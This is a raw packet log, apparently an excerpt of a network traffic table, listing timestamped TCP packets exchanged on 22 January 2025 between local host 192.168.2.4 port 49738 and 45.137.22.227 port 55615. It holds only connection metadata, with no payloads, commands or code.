Jan 22, 2025 14:12:11.903497934 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903529882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903532028 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903561115 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903588057 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903594017 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903615952 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903623104 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903644085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903652906 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903675079 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903686047 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903711081 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903712988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903739929 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903740883 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903769016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903775930 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903795958 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903809071 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903824091 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903835058 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903851986 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903863907 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903878927 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903893948 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903907061 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903934002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903935909 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903960943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903964043 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903990030 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904017925 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904041052 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904045105 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904073000 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904097080 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904098988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904126883 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904145956 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904159069 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904187918 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904191017 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904213905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904242039 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904247046 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904269934 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904295921 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904310942 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904323101 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904326916 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904350996 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904381037 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904403925 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904414892 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904442072 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904444933 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904469967 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904489040 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904498100 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904526949 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904542923 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904555082 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904571056 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904582024 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904608965 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904637098 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904663086 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904680014 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904690027 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904717922 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904743910 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904758930 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904771090 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904774904 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904798985 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904824972 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904828072 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904855967 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904881954 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904886961 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904910088 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904937029 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904959917 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904963017 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.904983997 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.904990911 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905016899 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905044079 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905050039 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905073881 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905100107 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905126095 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905129910 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905153990 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905173063 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905180931 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905208111 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905224085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905235052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905261993 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905275106 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905288935 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905316114 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905318022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.905358076 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.905401945 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910145044 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910202980 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910265923 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910280943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910373926 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910443068 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910455942 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910528898 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910559893 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910573006 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910629034 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910640001 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910651922 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910717964 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910772085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910801888 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910844088 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910862923 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910866022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910901070 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.910916090 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.910978079 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911019087 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911032915 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911072016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911072016 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911088943 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911098957 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911122084 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911123037 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911137104 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911158085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911169052 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911185980 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911204100 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911210060 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911222935 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911237001 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911252022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911263943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911283016 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911288977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911295891 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911302090 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911334991 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911343098 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911358118 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911371946 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911381006 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911401987 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911412954 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911413908 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911427021 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911442995 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911449909 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911485910 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911487103 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911499977 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911503077 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911516905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911528111 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911544085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911566019 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911577940 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911581039 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911606073 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911616087 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911628008 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911655903 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911669970 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911679029 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911694050 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911716938 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911748886 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911752939 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911761999 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911776066 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911781073 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911798954 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911806107 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911813021 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911824942 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911838055 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911849022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911851883 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911864996 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911874056 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911915064 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911920071 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911933899 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911945105 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911962032 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911966085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.911989927 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.911990881 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912038088 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912050962 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912062883 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912072897 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912085056 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912096024 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912098885 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912108898 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912121058 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912133932 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912154913 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912178040 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912180901 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912189960 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912204981 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912213087 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912225008 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912229061 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912240982 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912276030 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912290096 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912302017 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912313938 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912323952 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912324905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912363052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912364006 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912381887 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912396908 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912405014 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912425995 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912437916 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912442923 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912451982 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912463903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912466049 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912476063 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912483931 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912492990 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912528038 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912534952 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912564993 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912570000 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912578106 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912605047 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912606001 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912620068 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912631035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912642002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912647009 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912667036 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912688971 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912688971 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912702084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912724972 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912738085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912755966 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912767887 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912774086 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912781954 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912790060 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912811041 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912833929 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912839890 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912862062 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912863970 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912887096 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912898064 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912906885 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912935019 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912945032 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.912949085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.912988901 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913014889 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913084984 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913120031 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913130999 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913149118 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913153887 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913177013 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913188934 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913197041 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913218021 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913222075 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913230896 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913261890 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913269997 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913285971 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913296938 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913300037 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913309097 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913312912 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913328886 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913337946 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913352966 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913376093 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913383961 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913395882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913407087 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913424969 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913429976 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913455963 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913466930 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913479090 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913487911 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913508892 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913518906 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913532019 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913537979 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913544893 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913558006 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913563013 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913568974 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913582087 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913593054 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913595915 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913605928 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913618088 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913628101 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913639069 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913650990 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913650990 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913662910 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913664103 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913685083 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913697004 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.913707018 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.913748026 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914082050 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914110899 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914141893 CET	49738	55615	192.168.2.4	45.137.22.227
